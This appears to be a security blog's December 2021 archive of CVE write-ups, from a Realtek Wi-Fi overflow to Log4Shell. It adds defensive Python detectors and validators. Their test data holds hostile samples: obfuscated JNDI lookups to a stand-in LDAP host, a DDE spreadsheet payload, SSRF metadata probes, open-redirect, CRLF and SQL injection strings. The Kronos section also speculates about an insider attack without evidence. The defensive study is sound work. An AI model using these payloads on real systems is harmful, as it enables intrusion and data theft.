All posts by admin

CVE-2021-39306 – A stack buffer overflow was discovered on Realtek RTL8195AM device before 2.0.10 (22nd Dec, 2021)

Preface: In 2021 there are more than 10 billion active IoT devices. Wi-Fi connectivity is part of almost every one of them; it is not a feature a device can do without.

Background: The Realtek RTL8195AM is a highly integrated single-chip with a low-power-consumption mechanism ideal for IoT (Internet of Things) applications. It combines an ARM®Cortex™-M3 MCU, WLAN MAC, a 1T1R capable WLAN baseband /RF and NFC in a single chip. It provides useful high-speed connectivity interfaces, such as USB 2.0 host, USB 2.0 device, SDMMC HS, SDIO device, and Ethernet MII/RMII interfaces.

To get started with using MQTT, you can follow the basic example guide here for the RTL8195 development board. This example uses the MQTT protocol to allow for control of an LED over the internet. Source code for the example can be found at AmebaIoT’s GitHub repository.

Vulnerability details: A stack buffer overflow was discovered on Realtek RTL8195AM devices before 2.0.10. It lies in the client (station) code: an attacker who controls or spoofs the access point sends an oversized Authentication challenge text during WEP Shared Key authentication, and the client copies it into a fixed-size stack buffer without checking the length.

Official announcement: https://www.amebaiot.com/en/security_bulletin/cve-2021-39306/

Reference 1: In Shared Key authentication, the WEP key is used for authentication in a four-step challenge-response handshake:

1. The client sends an authentication request to the Access Point.
2. The Access Point replies with a clear-text challenge.
3. The client encrypts the challenge text using the configured WEP key and sends it back in another authentication request.
4. The Access Point decrypts the response. If this matches the challenge text, the Access Point sends back a positive reply.

Step 2 is where the vulnerable length arrives: the challenge text, and the length field that describes it, come from whoever is answering as the access point.

Reference 2: The access point responds by generating a sequence of characters called the challenge text. The computer encrypts the challenge text with its WEP key and transmits the “message” back to the access point.
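The handshake described in the two references above, run end to end as an added example. This is illustrative code written for this post, not Realtek or Ameba firmware: the frames are reduced to the Challenge Text element, the WEP ICV is omitted, and the station's buffer size (STATION_BUF, 128 bytes, matching the standard challenge length) is an assumption. The third check in parse_challenge_element is the one whose absence produces a stack overflow of the kind the advisory describes; here it raises instead.

```python
import os

CHALLENGE_LEN = 128        # Challenge Text length used by Shared Key authentication
EID_CHALLENGE_TEXT = 16    # element ID of the Challenge Text element
STATION_BUF = 128          # assumed size of the station's fixed challenge buffer


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 keystream XOR; WEP keys RC4 with IV || WEP key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_crypt(wep_key: bytes, iv: bytes, data: bytes) -> bytes:
    """WEP encryption/decryption of one frame body (the CRC-32 ICV is omitted)."""
    return rc4(iv + wep_key, data)


def build_challenge_element(challenge: bytes) -> bytes:
    """Element layout: ID (1 byte) | length (1 byte) | data. Sent by the AP in step 2."""
    return bytes([EID_CHALLENGE_TEXT, len(challenge)]) + challenge


def parse_challenge_element(elem: bytes, buf_size: int = STATION_BUF) -> bytes:
    """Station side of step 2. The length byte is peer-supplied; the third
    check is the one a stack-buffer overflow of this kind is missing."""
    if len(elem) < 2 or elem[0] != EID_CHALLENGE_TEXT:
        raise ValueError("not a Challenge Text element")
    length = elem[1]
    if len(elem) - 2 < length:
        raise ValueError("element truncated")
    if length > buf_size:
        raise ValueError(f"challenge of {length} bytes does not fit {buf_size}-byte buffer")
    return elem[2:2 + length]


def station_accepts_challenge(elem: bytes) -> bool:
    """True if the station would proceed to step 3 with this element."""
    try:
        parse_challenge_element(elem)
        return True
    except ValueError:
        return False


def shared_key_handshake(station_key: bytes, ap_key: bytes,
                         challenge_len: int = CHALLENGE_LEN) -> bool:
    """Runs both sides of the handshake; returns True when the AP accepts."""
    # Step 1: station -> AP, authentication request (algorithm 1, sequence 1).
    # Step 2: AP -> station, clear-text challenge (sequence 2).
    challenge = os.urandom(challenge_len)
    frame_from_ap = build_challenge_element(challenge)
    # Step 3: station encrypts the challenge with its configured WEP key
    # under a fresh IV and sends it back (sequence 3).
    received = parse_challenge_element(frame_from_ap)
    iv = os.urandom(3)
    frame_from_station = iv + wep_crypt(station_key, iv, received)
    # Step 4: AP decrypts with its own key and compares with what it sent.
    decrypted = wep_crypt(ap_key, frame_from_station[:3], frame_from_station[3:])
    return decrypted == challenge


if __name__ == "__main__":
    key = bytes.fromhex("0102030405")   # constructed 40-bit WEP key
    print("same key accepted:", shared_key_handshake(key, key))
    print("wrong key accepted:", shared_key_handshake(key, b"\x00" * 5))
    big = build_challenge_element(b"A" * 200)   # constructed oversized element
    print("oversized challenge accepted:", station_accepts_challenge(big))
```

Because the IE length field is a single byte, a rogue access point can claim up to 255 bytes of challenge text; a station that copies that many bytes into a 128-byte buffer overruns it by up to 127 bytes, which is why the length must be checked against the buffer rather than trusted.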

About AmegaView: AmegaView 3.0 reaches end of life at the end of December 2021, so the vendor does not plan to release a patch (21st Dec, 2021)

Preface: The CVE records for Mesa Labs AmegaView 3.0 were published by the CVE Numbering Authority on 21 Dec 2021. Given where the product is deployed, the flaws may affect hospitals, blood banks, pharmaceutical companies and laboratories around the world. The details had in fact already been covered in a HIPAA-related report in June this year.

Background: The AmegaView Environmental Monitoring System (CMS) 3.0 was released in 2015. It consists of a robust hardware package and Mesa’s user-friendly software.
AmegaView is used to monitor parameters including temperature, humidity, CO2, O2, differential pressure, leak detection, voltage, door switches, switch closures, air flow, refrigerators, freezers……
Because of that function it is found in hospitals, blood banks, pharmaceutical plants, laboratories and similar environments.

Vulnerability details:

CVE-2021-27447 – CVSS 10/10 – Flaw due to improper neutralization of special elements used in a command, which could allow an attacker to execute arbitrary code.
CVE-2021-27449 – CVSS 9.9/10 – Flaw due to improper neutralization of special elements used in a command, which could allow an attacker to execute commands in the web server.
CVE-2021-27445 – CVSS 7.8/10 – Insecure file permissions which could be exploited to elevate privileges on the device.
CVE-2021-27451 – CVSS 7.3/10 – Improper authentication due to passcodes being generated by an easily reversible algorithm, which could allow an attacker to gain access to the device.
CVE-2021-27453 – CVSS 7.3/10 – Authentication bypass issue that could allow an attacker to gain access to the web application.

If you are interested in possible attack scenarios, please refer to the attached drawings for reference.

Ref – ICS Advisory (ICSA-21-147-03): https://www.cisa.gov/uscert/ics/advisories/icsa-21-147-03

When a product encounters a defect, it is not bad news. It will be safer than other products in the future (20th Dec, 2021)

Preface: Sometimes a misconfiguration, or the abuse of a deliberately powerful feature, turns into a vulnerability.

Background: Apache module mod_lua (from the official documentation): this module holds a great deal of power over httpd, which is both a strength and a potential security risk. It is not recommended that you use this module on a server that is shared with users you do not trust, as it can be abused to change the internal workings of httpd.

The basic module loading directive is: LoadModule lua_module modules/mod_lua.so
Remark: mod_lua provides a handler named lua-script, which can be used with a SetHandler or AddHandler directive.

Vulnerability details: CVE-2021-44790: a carefully crafted request body can cause a buffer overflow in the mod_lua multipart parser (r:parsebody() called from Lua scripts).
The Apache httpd team is not aware of an exploit for the vulnerability, though it might be possible to craft one. This issue affects Apache HTTP Server 2.4.51 and earlier.

Comment: The official note quoted in the background above already tells Apache system owners to treat mod_lua with care.
Seen in that light, the exposure is largely a matter of configuration: only a server that loads mod_lua and has a Lua handler calling r:parsebody() on untrusted request bodies is reachable through this bug, so the first check is whether the module is loaded at all, and whether any Lua script on the server parses uploads.

Reference: https://www.openwall.com/lists/oss-security/2021/12/20/4

A closer look at CVE-2021-22054: advisory addressing a vulnerability in the Workspace ONE UEM console (19th Dec 2021)

Preface: CISA urges vigilance on the VMware Workspace ONE UEM console.

Background: An HTTP handler such as BlobHandler.ashx exists to serve blobs (Binary Large Objects) such as an image, a video or a file.
In a nutshell, the blob handler lets the application hand out a URL that displays a blob stored in the database. Is there any security concern with this pattern? Such a handler can be called from jQuery, passed data and return JSON, so whatever parameters it accepts are reachable by anyone who can reach the endpoint. The vendor released a remediation last Friday (16th Dec, 2021): a Server Side Request Forgery (SSRF) vulnerability in the VMware Workspace ONE UEM console was privately reported to VMware. Patches and workarounds are available to address this vulnerability in affected VMware products. The issue has been mitigated for VMware-hosted Workspace ONE consoles. For more details, please refer to the link – https://www.vmware.com/security/advisories/VMSA-2021-0029.html

Observation: The vendor’s workaround blocks any request to the BlobHandler.ashx endpoint that carries a “url” query parameter. After applying it, a matching request should receive a 404 Not Found response. For more details, please refer to the link – https://kb.vmware.com/s/article/87167

It is not clear whether the web server applies any further regular expression of its own on top of the vendor rule. Administrators should in any case make sure the blocking rule matches case-insensitively: the handler path and the parameter name are unlikely to be case-sensitive on the application side, so a case-sensitive rule could be bypassed simply by changing the case of “BlobHandler.ashx” or “url”.
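The case-sensitivity concern above, made concrete as an added example (this is not VMware’s rule or code). It puts a literal, case-sensitive match of the kind the observation warns about beside a normalised one that percent-decodes and lower-cases the path and parameter names before comparing. The handler name comes from the advisory; the exact path prefix on a given console is not stated, so only the suffix is matched, and the sample request targets are constructed.

```python
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed form of the target URL: the handler name is from the advisory, the
# path prefix is not, so only the suffix is matched.
BLOCKED_HANDLER = "/blobhandler.ashx"
BLOCKED_PARAM = "url"


def naive_should_block(request_target: str) -> bool:
    """Literal, case-sensitive rule of the kind the observation warns about."""
    path, _, query = request_target.partition("?")
    has_url = any(p.split("=", 1)[0] == BLOCKED_PARAM for p in query.split("&"))
    return path.endswith("/BlobHandler.ashx") and has_url


def should_block(request_target: str) -> bool:
    """Normalised rule: percent-decode and lower-case both the path and the
    parameter names before comparing, so case and encoding tricks do not
    slip past."""
    parts = urlsplit(request_target)
    path = unquote(parts.path).lower()
    if not path.endswith(BLOCKED_HANDLER):
        return False
    names = parse_qs(parts.query, keep_blank_values=True)  # parse_qs decodes names
    return any(name.lower() == BLOCKED_PARAM for name in names)


def handle(request_target: str) -> int:
    """Status code the console should return: 404 when the workaround applies."""
    return 404 if should_block(request_target) else 200


# Constructed request targets; 169.254.169.254 is the usual SSRF probe target.
REQUESTS = [
    "/BlobHandler.ashx?url=http://169.254.169.254/latest/meta-data/",
    "/BLOBHANDLER.ASHX?URL=http://169.254.169.254/latest/meta-data/",
    "/BlobHandler.ashx?%75rl=http://169.254.169.254/",
    "/blobhandler%2Eashx?Url=http://10.0.0.1/",
    "/BlobHandler.ashx?id=7d1c",          # legitimate blob fetch by id (assumed)
    "/Other.ashx?url=http://10.0.0.1/",
]

if __name__ == "__main__":
    for target in REQUESTS:
        print(f"{target:62s} naive={naive_should_block(target)!s:5} normalised={handle(target)}")
```

Only the first request is caught by the literal rule; the next three reach the handler untouched, which is exactly the gap a case-insensitive, decode-first rule closes.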

About CVE-2021-43812 : Are you using nextjs-auth0 ? (16th Dec, 2021)

Preface: The Auth0 Next.js SDK is a library for implementing user authentication in Next.js applications.

Background: Auth0 offers two ways to implement login authentication for your Next.js applications:

  • Universal Login where users log in to your application through a page hosted by Auth0.
  • Embedded Login where users log in to your application through a page you host.

Vulnerability details: With nextjs-auth0 the client application redirects the user to the Auth0 server, which handles all the required authentication and authorization logic (sign-up, sign-in, MFA, consent, and so on). Once the user logs in, Auth0 redirects them back to your application with an Authorization Code in the query string. Versions of the SDK before 1.6.2 do not filter out certain returnTo parameter values from the login URL, which exposes the application to an open redirect vulnerability.

An open redirect lets an attacker send users from the trusted site to one they control. On its own it is mostly a phishing aid; combined with other weaknesses (for example server-side request forgery, XSS-Auditor bypasses, or OAuth flows that deliver tokens to the redirect target) it raises the impact considerably.
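One way to validate a returnTo value, as an added example that is not the SDK’s own filter: only a path on the current origin is accepted, so protocol-relative (//host), backslash (/\host), absolute-URL and scheme forms are all rejected, and the checks are repeated on the percent-decoded value in case a downstream component decodes it. The function names, the length cap and the test cases are this example’s own.

```python
from typing import Optional
from urllib.parse import unquote, urlsplit

DEFAULT_RETURN_TO = "/"


def is_safe_return_to(value: str) -> bool:
    """Accept only a path on the current origin: it must start with exactly one
    '/', carry no scheme or host, and contain no control characters."""
    if not value or len(value) > 2048:
        return False
    for candidate in (value, unquote(value)):
        if any(ord(ch) < 0x20 or ch == "\x7f" for ch in candidate):
            return False                      # \t, \r, \n confuse browsers and proxies
        if not candidate.startswith("/"):
            return False                      # relative paths and scheme:... forms
        if candidate[1:2] in ("/", "\\"):
            return False                      # '//host' and '/\host' are treated as absolute
        parts = urlsplit(candidate)
        if parts.scheme or parts.netloc:
            return False
    return True


def login_redirect_target(return_to: Optional[str]) -> str:
    """Where to send the user after Auth0 hands back the authorization code."""
    if return_to and is_safe_return_to(return_to):
        return return_to
    return DEFAULT_RETURN_TO


# Constructed values an attacker might place in ?returnTo=
CASES = {
    "/dashboard": True,
    "/orders?id=42#top": True,
    "//evil.example/phish": False,
    "/\\evil.example/phish": False,
    "https://evil.example/": False,
    "javascript:alert(1)": False,
    "/%2f%2fevil.example": False,     # decodes to //evil.example
    "/%0d%0aLocation:%20https://evil.example": False,
    "": False,
}

if __name__ == "__main__":
    for value, expected in CASES.items():
        print(f"{value!r:45} safe={is_safe_return_to(value)} (expected {expected})")
```

An allowlist of exact paths is stricter still; the point of the check above is that the decision never depends on string matching against a hostname, which is where most open-redirect filters go wrong.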

Reference: Next.js is a JavaScript framework created by Zeit (now Vercel).
It lets you build server-side rendered and static web applications using React. React Native, the related mobile framework, is used by Facebook, Instagram, Walmart, Bloomberg, Tesla and others.

Official announcement: https://github.com/auth0/nextjs-auth0/security/advisories/GHSA-2mqv-4j3r-vjvp

About CVE-2021-39656 (Android), are you interested to know? (15-12-2021)

Preface: Android’s biggest advantage is arguably in hardware, not software. The best part of the platform is its flexibility in accommodating third-party applications, which lets users add functionality to their devices.

Background: Configfs is a ram-based filesystem that provides the converse of sysfs’s functionality. Where sysfs is a filesystem-based view of kernel objects, configfs is a filesystem-based manager of kernel objects, or config_items.

Both sysfs and configfs can and should exist together on the same system. One is not a replacement for the other.

Privileged (kernel) mode is the processing mode that gives code direct access to all hardware and memory in the system. When a process wants to use functionality controlled by the operating system, it makes a system call; the instructions that service that call run in kernel mode.

Vulnerability details: The remedy for CVE-2021-39656 was completed in March 2021. This week’s CVE record provides a summary (see below):

In __configfs_open_file of file.c, there is a possible use-after-free due to improper locking. This could lead to local escalation of privilege in the kernel with System execution privileges needed.

Remedy: To fix this issue, remove the config_item_put in __configfs_open_file to balance the refcount of config_item. Please refer to the attached picture for details.

Official announcement: https://android.googlesource.com/kernel/common/+/14fbbc8297728e880070f7b077b3301a8c698ef9

CVE-2021-42064: an undocumented limitation that, under certain circumstances, exposes the backend DB (14th Dec, 2021)

Preface: Oracle limits a static IN list to 1000 items (ORA-01795: maximum number of expressions in a list is 1000). How do you get past it? Any predicate of the form x IN (1,2,3) can be rewritten as (1,x) IN ((1,1),(1,2),(1,3)), and the 1000-element limit no longer applies to such multi-column lists.

Background: SAP Commerce organizes data such as product information so that it can be propagated consistently and efficiently through multiple communication channels, which lets businesses sell products across several distribution channels. A related Oracle error, ORA-01792, reports that the maximum number of columns in a table or view is 1000; both limits are design limitations of the database that are easy to overlook rather than anything the application documents.

Vulnerability details: If SAP Commerce is configured to use an Oracle database and a query is created using the flexible search Java API with a parameterized “in” clause, SAP Commerce versions 1905, 2005, 2105 and 2011 allow an attacker to execute crafted database queries, exposing the backend database. The vulnerability is present if the parameterized “in” clause accepts more than 1000 values.

Observation: The backend consists of the server that provides data on request, the application that channels it, and the database that organizes the information. An attacker who learns these details (which database, how a query is assembled, which input makes it fail) has an easier time crafting SQL injection.
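How an application can accept more than 1000 values for an “in” predicate without either hitting the Oracle limit or splicing values into SQL text, as an added example. This is not SAP’s flexible search code or its fix; it is a plain Python/DB-API illustration of the two safe shapes (ORed chunks of bound parameters, and the (1, x) tuple rewrite from the preface) next to the unsafe string-building shape. SQLite stands in for Oracle, so the chunk limit is passed explicitly to make the split visible on a small constructed catalogue.

```python
import sqlite3
from typing import Iterable, List, Tuple

ORACLE_IN_LIMIT = 1000   # ORA-01795: maximum number of expressions in a list is 1000


def unsafe_in_clause(column: str, values: Iterable[str]) -> str:
    """What not to do: values spliced into the SQL text. A value containing a
    quote changes the statement, which is the classic injection shape."""
    return f"{column} IN ({', '.join(repr(v) for v in values)})"


def chunked_in_clause(column: str, values: Iterable[str],
                      limit: int = ORACLE_IN_LIMIT) -> Tuple[str, List[str]]:
    """Return (sql_fragment, params): every value is a bound parameter and the
    list is split into ORed IN lists of at most `limit` members."""
    params = list(values)
    if not params:
        return "1=0", []
    pieces = []
    for start in range(0, len(params), limit):
        n = min(limit, len(params) - start)
        pieces.append(f"{column} IN ({', '.join('?' * n)})")
    return "(" + " OR ".join(pieces) + ")", params


def tuple_in_clause(column: str, values: Iterable[str]) -> Tuple[str, List[str]]:
    """The (1, x) IN ((1, ?), ...) rewrite from the preface, as text plus params."""
    params = list(values)
    if not params:
        return "1=0", []
    return f"(1, {column}) IN ({', '.join('(1, ?)' for _ in params)})", params


def fetch_products(conn: sqlite3.Connection, codes: Iterable[str],
                   limit: int = ORACLE_IN_LIMIT) -> List[Tuple[str, str]]:
    frag, params = chunked_in_clause("code", codes, limit)
    return conn.execute(f"SELECT code, name FROM products WHERE {frag} ORDER BY code",
                        params).fetchall()


def demo_db() -> sqlite3.Connection:
    """Constructed catalogue of 300 products used to exercise the chunking."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (code TEXT PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [(f"P{i:04d}", f"Product {i}") for i in range(300)])
    return conn


if __name__ == "__main__":
    conn = demo_db()
    wanted = [f"P{i:04d}" for i in range(250)]
    # limit=100 stands in for Oracle's 1000 so the split is visible on a small set
    rows = fetch_products(conn, wanted, limit=100)
    print(len(rows), "rows from", chunked_in_clause("code", wanted, 100)[0].count("IN ("), "chunks")
    print(unsafe_in_clause("code", ["P0001", "x') OR 1=1 --"]))
```

The last print shows why the chunking has to stay parameterised: the moment values are formatted into the statement, the 1000-item limit is the least of the problems.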

Official details: For more details, please refer to the link – https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+December+2021

Kronos hit by ransomware; the cause is unknown, but the original design has a weakness (14-12-2021)

Preface: In October 2020, two of the largest human resources (HR) technology vendors out there—Kronos and Ultimate Software—merged into UKG (Ultimate Kronos Group). Together, the two companies now bring customers more than 70 combined years of experience in the industry.

Background: Kronos integrates with other systems by accepting CSV files as an import data source. The integration is done via a comma-delimited flat file (CSV) in Windows format, delivered to the Kronos server daily via SFTP. Can a CSV contain malicious code? When a spreadsheet application opens the file, it parses and evaluates any cell beginning with “=” before showing the content to the user. A formula injected into the CSV may call system functions or carry a payload that exploits the victim’s machine. So the answer is yes, it is possible. But the code is not executed automatically; it takes social engineering to get a user to open the file and approve the action.

If Kronos Workforce Central is hosted in the cloud and the victim’s workstation has a mapped share to the Workforce Central server, a CSV triggered through social engineering could download a ransomware payload, which then encrypts everything it can reach, the share included.
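A check for the CSV formula-injection scenario described above, as an added example (not Kronos or UKG code): it scans an import file for cells a spreadsheet would evaluate and re-emits the file with those cells neutralised by a leading apostrophe. The feed layout and the payload row are constructed; the payload follows the classic DDE shape, which Excel only runs after prompting the user, which is the social-engineering step. Signed numbers such as -5 start with a trigger character too, so the check exempts anything that parses as a number.

```python
import csv
import io
from typing import List, Tuple

FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def _is_plain_number(cell: str) -> bool:
    try:
        float(cell)
        return True
    except ValueError:
        return False


def is_formula(cell: str) -> bool:
    """A spreadsheet evaluates cells that start with a trigger character.
    Signed numbers such as -5 also start with one, so they are exempted."""
    if not cell.startswith(FORMULA_TRIGGERS):
        return False
    if cell[0] in "+-" and _is_plain_number(cell):
        return False
    return True


def neutralise(cell: str) -> str:
    """Prefix a single quote: the spreadsheet then stores the cell as text."""
    return "'" + cell if is_formula(cell) else cell


def scan_csv(text: str) -> List[Tuple[int, int, str]]:
    """(row, column, value) for every cell that would be evaluated on open."""
    return [(r, c, cell)
            for r, row in enumerate(csv.reader(io.StringIO(text)))
            for c, cell in enumerate(row) if is_formula(cell)]


def sanitise_csv(text: str) -> str:
    """Re-emit the file with formula cells neutralised, Windows line endings kept."""
    out = io.StringIO()
    writer = csv.writer(out, lineterminator="\r\n")
    for row in csv.reader(io.StringIO(text)):
        writer.writerow([neutralise(cell) for cell in row])
    return out.getvalue()


# Constructed time-import feed; row 2 carries a DDE-style payload shape.
SAMPLE_FEED = (
    "employee_id,name,hours_adjustment\r\n"
    "1001,Alice Example,40\r\n"
    "1002,=cmd|' /C calc'!A0,38\r\n"
    "1003,Bob Example,-5\r\n"
)

if __name__ == "__main__":
    for hit in scan_csv(SAMPLE_FEED):
        print("formula cell:", hit)
    print(sanitise_csv(SAMPLE_FEED))
```

Run the scan on the inbound SFTP drop before anyone opens the file in Excel; the sanitised copy is what should be handed to staff, and the original kept only for the import job, which treats every field as data.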

So if Kronos was hit through this path, it most likely involved an insider. An insider threat is defined as the threat that an employee or a contractor will use his or her authorized access, wittingly or unwittingly, to do harm to the cloud system.

Details of the attack: headline news – “Kronos Warns Cyberattack May Knock HR Software Offline for Weeks”. Kronos hasn’t said whether the attack is related to the Log4Shell vulnerability discovered this past weekend. For more details, please refer to the link https://www.bloomberg.com/news/articles/2021-12-14/kronos-warns-cyberattack-may-knock-hr-software-offline-for-weeks

About CVE-2021-44228 & CVE-2021-4097 (12th Dec 2021)

Preface: We like Java, and sometimes we hate it. People keep predicting that PHP will die out, yet many people still use it.

Background: Apache was a pioneer of the web server market. Over time, concerns about its overall design led a group of users to migrate to NGINX, but Apache still has a loyal following, and a large one, vendors included. Is NGINX safer than Apache? A platform almost always has to work with other application components to form a service, so it makes little sense to judge whether a single component is safe in isolation.

According to numerous open source reports, Log4j is used with Apache software like Apache Struts, Solr and Druid, along with other technologies. Apache Log4j is a very old logging framework and was the most popular one for several years. It introduced basic concepts, like hierarchical log levels and loggers, that are still used by modern logging frameworks. The development team announced the end of life of Log4j 1.x in 2015; CVE-2021-44228 concerns its successor, Log4j 2.

PHP Server Monitor (phpservermon) is a script that checks whether your websites and servers are up and running. It comes with a web-based user interface where you can manage your services and websites, and you can manage users for each server with a mobile number and email address.

Vulnerability details:

CVE-2021-44228 – Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.

Ref: https://nvd.nist.gov/vuln/detail/CVE-2021-44228
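A detection pass for the JNDI lookup described in the CVE text, as an added example written for this post (not Apache’s or any vendor’s detector). Attackers wrap the string in nested Log4j lookups such as ${lower:j} or ${::-j} so a plain search for “jndi” misses it; the scanner resolves the default-value and case lookups until nothing changes, percent-decodes the line first, and only then searches for ${jndi:. The log lines are constructed and use the 198.51.100.0/24 documentation range.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# ${...:-default} collapses to its default; ${lower:x}/${upper:x} change case.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^{}]*)\}", re.IGNORECASE)
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalise_lookups(text: str, max_rounds: int = 20) -> str:
    """Resolve the nested lookups used to hide the string 'jndi'. Each round
    only matches lookups with no further braces inside, so innermost first;
    repeat until nothing changes."""
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text)
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:
            return text
        text = new
    return text


def contains_jndi_lookup(line: str) -> bool:
    return bool(_JNDI.search(normalise_lookups(unquote(line))))


def scan_log(lines: List[str]) -> List[Tuple[int, str]]:
    """(line index, normalised line) for every line carrying a JNDI lookup."""
    return [(i, normalise_lookups(unquote(line))) for i, line in enumerate(lines)
            if contains_jndi_lookup(line)]


# Constructed access-log lines (Apache combined format).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '10.0.0.5 - - [10/Dec/2021:12:00:06 +0000] "GET / HTTP/1.1" 200 512 "-" "${date:yyyy} benign lookup"',
]

if __name__ == "__main__":
    for index, normalised in scan_log(SAMPLE_LOG):
        print(f"line {index}: {normalised}")
```

Any field an attacker controls (User-Agent, query strings, headers, form fields) can carry the lookup, so the scan belongs on the full request line, not only on the user agent; and a hit in the log proves exposure of the logging path, not of the server, which is what the patch level decides.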

CVE-2021-4097 – A vulnerability was found in phpservermon (version not stated) and classified as critical: it is vulnerable to improper neutralization of CRLF sequences. In a CRLF injection the attacker is able to inject CR (carriage return, ASCII 13) and LF (line feed, ASCII 10) characters into the web application’s output. This lets the attacker add extra headers to HTTP responses or even make the browser ignore the original content and process injected content instead.

Ref: https://www.tenable.com/cve/CVE-2021-4097
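What the CRLF injection described above does to a response, and the check that stops it, as an added example (not phpservermon code). An unchecked response builder is fed an attacker-controlled redirect target that contains CR LF; parsing the result the way a browser would shows an extra Set-Cookie header and an injected body. The checked builder refuses any header value containing CR, LF or NUL. The injected value is constructed and is shown already URL-decoded, because %0d%0a in a request is decoded by the framework before the value reaches the header.

```python
from typing import List, Tuple

CRLF = b"\r\n"


def is_valid_header_value(value: str) -> bool:
    """Reject CR, LF and NUL; runs on the decoded value."""
    return not any(ch in value for ch in "\r\n\x00")


def build_response_unchecked(status: str, headers: List[Tuple[str, str]],
                             body: bytes = b"") -> bytes:
    """Serialises headers exactly as given: the shape of a CRLF-injection bug."""
    lines = [f"HTTP/1.1 {status}".encode()]
    lines += [f"{name}: {value}".encode() for name, value in headers]
    return CRLF.join(lines) + CRLF + CRLF + body


def build_response_checked(status: str, headers: List[Tuple[str, str]],
                           body: bytes = b"") -> bytes:
    for name, value in headers:
        if not is_valid_header_value(value):
            raise ValueError(f"CR/LF in header {name!r}")
    return build_response_unchecked(status, headers, body)


def parse_response(raw: bytes) -> Tuple[str, List[Tuple[str, str]], bytes]:
    """Split a raw response the way a browser would: (status, headers, body)."""
    head, _, body = raw.partition(CRLF + CRLF)
    status, *header_lines = head.split(CRLF)
    headers = [tuple(part.strip().decode() for part in line.split(b":", 1))
               for line in header_lines]
    return status.decode(), headers, body


# Constructed attacker-controlled redirect target, already URL-decoded.
INJECTED = ("/dashboard\r\nSet-Cookie: PHPSESSID=attacker-chosen; Path=/"
            "\r\n\r\n<script>alert(1)</script>")


def demo() -> Tuple[List[Tuple[str, str]], bytes]:
    """Headers and body a browser sees when the injected value is emitted unchecked."""
    raw = build_response_unchecked("302 Found", [("Location", INJECTED)])
    _, headers, body = parse_response(raw)
    return headers, body


if __name__ == "__main__":
    headers, body = demo()
    print("headers seen by browser:", headers)
    print("body seen by browser:", body)
    print("checked builder accepts it:", is_valid_header_value(INJECTED))
```

Modern PHP and most frameworks already refuse CR/LF in header() calls; the bug class survives wherever an application assembles header text itself or writes a redirect target into a raw response, which is why the check sits in the builder rather than in each caller.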

The fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 still needed fine-tuning (9th Dec 2021)

Preface: Some people say that cgi-bin is a historical relic, and that in today’s hostile security environment hardly anyone uses it. The truth is that cgi-bin still has room to survive.

Background: About two months ago, a proof of concept for CVE-2021-41773 (Apache 2.4.49, with 2.4.50 still affected through the follow-up CVE-2021-42013) was released. The fix is to upgrade, but how much a traversal bug can reach is decided by the httpd.conf configuration. As a matter of fact, Apache is a multifunctional, highly capable server, so if software developers and web masters make mistakes in that file, those mistakes expand the problem whenever a vulnerability occurs.

Vulnerability details (CVE-2021-42013): It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.

If files outside these directories are not protected by the usual default configuration “require all denied”, such requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow remote code execution.

Reference: In addition to the vulnerabilities above, the vendor has since disclosed further ones. For more details, please refer to the link – https://httpd.apache.org/security/vulnerabilities_24.html#2.4.49